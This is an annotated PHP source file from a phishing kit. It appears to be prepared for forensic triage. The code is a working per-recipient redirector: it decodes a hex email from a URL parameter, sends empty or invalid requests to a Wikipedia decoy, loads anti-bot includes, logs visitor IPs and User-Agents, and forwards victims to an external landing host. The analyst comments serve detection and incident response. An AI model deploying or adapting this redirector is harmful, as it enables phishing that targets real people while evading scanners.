File: /home/nciq25gegoxa/public_html/ha8x/index.php
<?php
/*
 * Analyst annotation: per-recipient redirector from a phishing kit.
 *
 * Reads the `cl` query parameter, keeps the text before the first '/' and
 * then before the first '-', and treats that as a hex-encoded e-mail address.
 * Requests that do not carry a plausible address are sent to a benign
 * Wikipedia page. All other requests are appended to clicks.txt and then
 * redirected to an external URL with the hex value placed in the fragment.
 *
 * Triage pointers visible in this file: the `cl=<hex>` request parameter,
 * the clicks.txt log, the anti.php / antibot.php includes, and the hostname
 * in the final header() call.
 */
// Turn off all PHP error reporting for this request.
error_reporting(0);
// Contents of the included files are not shown here; the names suggest
// visitor/bot filtering - confirm by reviewing them alongside this file.
// `require` aborts the script with a fatal error if a file is missing.
require 'anti.php';
// require 'anti2.php';
require 'antibot.php';
// Take the 'cl' query parameter: first '/'-separated segment, then the first
// '-'-separated piece of that segment. Anything after those separators is
// ignored by this script.
$cl = explode('/', $_GET['cl']);
$get = $cl[0];
$pieces = explode("-", $get);
$email = $pieces[0];
// Decoy path 1: an empty value (including a missing 'cl') is redirected to a
// harmless Wikipedia article and the script stops.
if ($email == "") {
header('Location: https://en.wikipedia.org/wiki/Art');
exit;
}
// Decode the hex string. hex2bin() returns false for malformed hex; in that
// case the strpos() check below finds no '@' and the decoy path is taken too.
$email64 = hex2bin($email);
// Decoy path 2: the only "validation" is that the decoded bytes contain '@'.
if (strpos($email64, '@') === false) {
header('Location: https://en.wikipedia.org/wiki/Art');
exit;
}
// Log the visit: append client IP and User-Agent to clicks.txt (relative path,
// so presumably next to this script - verify on the host). Forensic notes:
//  - this file records who reached the redirect and helps scope exposure;
//  - the decoded address is not written here, only IP and User-Agent;
//  - the separator is the literal two characters "rn", not CR/LF, so records
//    are not newline-delimited;
//  - the User-Agent is client-controlled and written unescaped; treat the
//    file contents as untrusted when opening or parsing them.
$file = fopen("clicks.txt", "a");
fwrite($file, $_SERVER['REMOTE_ADDR'] . ' ' . $_SERVER['HTTP_USER_AGENT'] . "rn");
fclose($file);
// MD5 of rand() is computed here, but $praga is never read again in this file.
$praga = md5(rand());
// Final redirect to the external landing URL. The original hex string (not the
// decoded address) is placed after '#'. A URL fragment is not sent to the
// destination server in the HTTP request, so the landing page presumably reads
// it client-side (not verifiable from this file). For detection, key on the
// destination hostname/path and on requests to this script carrying a hex
// `cl` value, rather than expecting the fragment in proxy or server logs.
header("Location: https://leanestate.de/drv30c23goo53c23goo23googlec5530c23589a/#{$email}");
exit;
?>